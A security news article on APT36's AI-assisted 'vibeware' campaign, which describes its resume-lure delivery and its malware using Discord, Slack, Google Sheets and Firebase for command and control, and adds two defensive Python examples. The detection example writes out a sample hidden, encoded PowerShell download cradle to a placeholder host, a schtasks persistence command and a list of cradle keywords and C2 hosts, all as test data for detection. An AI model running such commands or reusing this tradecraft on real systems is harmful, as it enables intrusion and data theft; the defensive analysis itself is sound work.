Transparent Tribe’s ‘Vibeware’ Shift Signals Rise of AI-Generated Malware at Industrial Scale

Pakistan-based threat actor APT36, widely known as Transparent Tribe, has shifted away from carefully crafted tools to a new approach called “vibeware” — AI-assisted malware produced in high volumes with little regard for quality.

Rather than investing time in one sophisticated piece of code, the group uses AI coding tools to pump out dozens of disposable implants rapidly. The goal is not technical brilliance but sheer volume: a constant stream of new samples that defenders struggle to track individually.

The campaign targets Indian government agencies, military personnel, and diplomatic missions, with secondary focus on Afghanistan’s government and several private businesses.

Attackers used LinkedIn to identify and profile high-value targets; screenshots of employee lists from military-related government agencies were recovered from the operators' own systems.

A recurring internal username, “Nightmare,” was found across the group’s own systems, suggesting a single operator or coordinated team sits at the core of this effort.

Bitdefender analysts found strong evidence of AI assistance within the group’s project files, including metadata pointing directly to AI-integrated code editors and Unicode emojis embedded in binary strings. Neither artifact is proof on its own, but together they are characteristic of vibe-coded development.

The group sustains a near-daily pace of new variant production across multiple programming languages.

Despite the volume, the tools are often error-prone and unfinished. One credential-stealing Go binary shipped with a blank placeholder where its command-and-control server address belonged, leaving it unable to function from the moment it was built.

Initial access is delivered through malicious emails carrying ZIP or ISO archives bundling shortcut (.LNK) files. A particularly effective lure uses a PDF document designed to look like a professional resume, featuring a large “Download Document” button.

Distributed Denial of Detection (DDoD) (Source - Bitdefender)

Clicking the button sends the victim to an attacker-controlled server that delivers a malicious archive automatically. Once the shortcut executes, PowerShell scripts run silently in memory, pulling down and activating the primary backdoor.

After that, the operators connect to the compromised machine manually to carry out further steps, a reminder that while the malware pipeline is AI-driven, the hands-on hacking is still a human operation.

How Vibeware Hides Behind Trusted Cloud Platforms

One of the most operationally effective aspects of this campaign is its heavy use of legitimate cloud services for command and control.

C2 Architecture (Source - Bitdefender)

APT36 routes communications through Discord, Slack, Google Sheets, Supabase, and Firebase, platforms that corporate firewalls routinely trust, making malicious traffic difficult to separate from normal activity.

CrystalShell, written in the Crystal language, uses Discord channels to issue commands and collect outputs from infected machines. Its counterpart, ZigShell, performs the same role through Slack.

SheetCreep, a C#-based backdoor, turns a Google Sheets spreadsheet into a live control hub, polling it for encrypted instructions and writing encrypted responses back into cells.

LuminousStealer, built in Rust, sends stolen file metadata to Firebase while uploading actual file contents to Google Drive — all authenticated through standard Google OAuth.

The Unicode emojis in LuminousStealer’s log strings, such as “📤 Sent folder metadata to Firebase” and “💿 Enumerating drive,” are further evidence that AI-generated code runs throughout this fleet. Emoji-decorated log lines are a habit of AI coding assistants, but they also appear in hand-written tooling, so on their own they are a triage signal rather than attribution.
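As an added triage example (this is not Bitdefender's tooling or code from the page), the following Python pulls printable UTF-8 runs out of a binary and reports the ones that carry emoji codepoints, plus the fraction of all strings that do. The sample blob is constructed inline to mimic the strings quoted above, and the Unicode ranges treated as emoji are our own choice. Hits are a prompt for a closer look, not proof of AI authorship.

```python
"""Triage helper: find emoji-bearing UTF-8 strings inside a binary blob.

Added example; not Bitdefender's tooling. The sample blob below is
constructed to mimic the LuminousStealer strings quoted in the article.
"""
from __future__ import annotations
import re

# Codepoint ranges treated as emoji/pictographs (assumption: our own list).
EMOJI_RANGES = (
    (0x1F300, 0x1FAFF),  # Misc Symbols and Pictographs through Symbols Ext-A
    (0x1F000, 0x1F2FF),  # Mahjong, domino, playing cards, enclosed ideographs
    (0x2600, 0x27BF),    # Misc Symbols and Dingbats
)

# Control characters and U+FFFD (from invalid UTF-8) terminate a string run.
RUN_BREAK = re.compile(r"[\x00-\x1f\x7f-\x9f\ufffd]+")


def is_emoji(cp: int) -> bool:
    return any(lo <= cp <= hi for lo, hi in EMOJI_RANGES)


def extract_utf8_strings(data: bytes, min_len: int = 6):
    """Yield printable UTF-8 runs of at least min_len characters.

    Invalid bytes decode to U+FFFD, which splits runs, so binary filler
    between genuine strings does not bleed into them.
    """
    text = data.decode("utf-8", errors="replace")
    for run in RUN_BREAK.split(text):
        if len(run) >= min_len:
            yield run


def emoji_strings(data: bytes, min_len: int = 6) -> list[str]:
    """Return the strings that contain at least one emoji codepoint."""
    return [s for s in extract_utf8_strings(data, min_len)
            if any(is_emoji(ord(ch)) for ch in s)]


def emoji_ratio(data: bytes, min_len: int = 6) -> float:
    """Fraction of extracted strings that carry emoji; 0.0 when none found."""
    strings = list(extract_utf8_strings(data, min_len))
    if not strings:
        return 0.0
    hits = sum(1 for s in strings if any(is_emoji(ord(c)) for c in s))
    return hits / len(strings)


# Constructed sample: PE-like header bytes, invalid-UTF-8 filler, two
# emoji-prefixed log strings modelled on those quoted in the article,
# ordinary import names, and an empty config key like the blank C2 field.
SAMPLE_BLOB = (
    b"MZ\x90\x00\x03\x00\x00\x00"
    + bytes(range(0x80, 0x100)) * 4
    + "\U0001F4E4 Sent folder metadata to Firebase".encode("utf-8") + b"\x00"
    + b"\x00" * 16
    + "\U0001F4BF Enumerating drive".encode("utf-8") + b"\x00"
    + b"kernel32.dll\x00GetProcAddress\x00C2_URL=\x00"
)


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BLOB
    for s in emoji_strings(blob):
        print(repr(s))
    print(f"emoji string ratio: {emoji_ratio(blob):.2f}")
```

Run it against a dropped sample to list the decorated strings; on the constructed blob it reports the two emoji log lines and a ratio of 0.40. A high ratio across a whole fleet of samples is worth noting in a report, but it should sit alongside the editor metadata and behavioral evidence rather than replace them.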

AI tools make this strategy particularly easy to execute. Public SDKs and thorough online documentation for these services give AI coding assistants enough training material to generate stable, working integration code on demand, requiring minimal expertise from the attacker’s side.

To defend against this type of campaign, security teams should prioritize behavioral detection over file-signature scanning: binaries built from niche languages such as Nim, Zig, and Crystal share little with the toolchain artifacts that existing signatures and static heuristics key on, so each new language effectively resets the detection baseline.

Outbound connections to trusted cloud platforms originating from unsigned or unverified binaries should be treated as potential indicators of compromise.

Scheduled task creation, process injection, fileless execution chains, and unusual PowerShell activity should all trigger immediate investigation, as this campaign relies on every one of them.

Maintaining an endpoint detection and response capability that flags suspicious process behavior — regardless of what language a binary was written in — remains the most reliable defense against a threat model built entirely on volume over skill.
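As an added example (not Bitdefender's detection content or code from the page), the three behavioral checks above expressed as Python rules over constructed endpoint telemetry: an unsigned image connecting to one of the named cloud platforms, PowerShell launched with a hidden window or an encoded command (the payload is decoded and scanned for download cradles), and scheduled task creation. The event fields, hostname list and sample events are our assumptions; a signed browser reaching discord.com is included to show the signer check suppressing the obvious false positive.

```python
"""Behavioural rules for the tradecraft above, run over constructed telemetry.
Added example, not Bitdefender's detection content; event shapes, host list
and sample events are illustrative assumptions."""
from __future__ import annotations
import base64
import re
from dataclasses import dataclass

# Cloud services the article names as C2 channels (suffix-matched).
TRUSTED_C2_HOSTS = ("discord.com", "discordapp.com", "discord.gg", "slack.com",
                    "sheets.googleapis.com", "drive.googleapis.com",
                    "firebaseio.com", "firestore.googleapis.com", "supabase.co")
# Download-cradle and decode primitives worth flagging in a PowerShell command.
CRADLE_RE = re.compile(r"\b(iex|invoke-expression|downloadstring|downloadfile|"
                       r"invoke-webrequest|frombase64string)\b")


@dataclass
class ProcessEvent:
    pid: int
    image: str
    parent_image: str
    cmdline: str
    signed: bool  # valid Authenticode signature on the image


@dataclass
class NetworkEvent:
    pid: int
    dest_host: str


@dataclass
class Finding:
    rule: str
    pid: int
    detail: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def host_matches(host: str, suffixes) -> bool:
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in suffixes)


def powershell_indicators(cmdline: str) -> list[str]:
    """Hidden window, encoded command, and download cradles. An -EncodedCommand
    payload is base64 over UTF-16LE; decode it so the regex sees the script."""
    tokens = cmdline.split()
    lowered = [t.lower() for t in tokens]
    hits, decoded = [], ""
    for i, tok in enumerate(lowered):
        if tok in ("-enc", "-encodedcommand", "-e", "-ec") and i + 1 < len(tokens):
            hits.append("encoded_command")
            try:
                decoded = base64.b64decode(tokens[i + 1]).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                decoded = ""
        elif tok in ("-w", "-windowstyle") and i + 1 < len(lowered) \
                and lowered[i + 1].startswith("hid"):
            hits.append("hidden_window")
    hits += ["cradle:" + c for c in CRADLE_RE.findall((cmdline + " " + decoded).lower())]
    return hits


def detect(processes, connections) -> list[Finding]:
    findings, by_pid = [], {p.pid: p for p in processes}
    # Rule 1: unsigned image talking to a trusted SaaS platform.
    for c in connections:
        p = by_pid.get(c.pid)
        if p and not p.signed and host_matches(c.dest_host, TRUSTED_C2_HOSTS):
            findings.append(Finding("unsigned_to_trusted_cloud", p.pid,
                                    f"{basename(p.image)} -> {c.dest_host}"))
    for p in processes:
        name, cmd = basename(p.image), p.cmdline.lower()
        # Rule 2: PowerShell with hidden window, encoded command or cradle.
        if name in ("powershell.exe", "pwsh.exe") and (ind := powershell_indicators(p.cmdline)):
            findings.append(Finding("suspicious_powershell", p.pid,
                                    f"parent={basename(p.parent_image)} " + ",".join(ind)))
        # Rule 3: scheduled task creation via schtasks or the PowerShell cmdlet.
        if (name == "schtasks.exe" and "/create" in cmd) or "register-scheduledtask" in cmd:
            findings.append(Finding("scheduled_task_creation", p.pid, p.cmdline))
    return findings


# Constructed sample telemetry; the stager is encoded as -EncodedCommand expects.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
ENCODED = base64.b64encode(STAGER.encode("utf-16le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_PROCESSES = [
    ProcessEvent(1001, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                 r"C:\Windows\explorer.exe", "chrome.exe", True),
    ProcessEvent(2002, r"C:\Users\u\AppData\Roaming\svc\updater.exe", PS, "updater.exe", False),
    ProcessEvent(3003, PS, r"C:\Windows\explorer.exe", f"powershell.exe -nop -w hidden -enc {ENCODED}", True),
    ProcessEvent(4004, r"C:\Windows\System32\schtasks.exe", PS,
                 r'schtasks.exe /create /sc minute /mo 5 /tn Updater /tr "C:\Users\u\AppData\Roaming\svc\updater.exe"', True),
    ProcessEvent(5005, PS, r"C:\Windows\System32\cmd.exe", "powershell.exe -NoProfile -Command Get-Process", True),
]
SAMPLE_CONNECTIONS = [
    NetworkEvent(1001, "discord.com"),         # signed browser: not flagged
    NetworkEvent(2002, "gateway.discord.gg"),  # unsigned implant: flagged
    NetworkEvent(2002, "sheets.googleapis.com"),
    NetworkEvent(5005, "example.com"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_PROCESSES, SAMPLE_CONNECTIONS):
        print(f"{f.rule:26} pid={f.pid} {f.detail}")
```

The rules deliberately ignore what language the flagged binary was written in: the unsigned updater is caught by who it talks to, the PowerShell stage by how it was launched and what its decoded payload does, and persistence by the task-creation command itself. Signed, interactive PowerShell and the browser's own traffic to Discord pass untouched, which is the behavior an EDR rule set needs in order to survive on real fleets.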

The post Transparent Tribe’s ‘Vibeware’ Shift Signals Rise of AI-Generated Malware at Industrial Scale appeared first on Cyber Security News.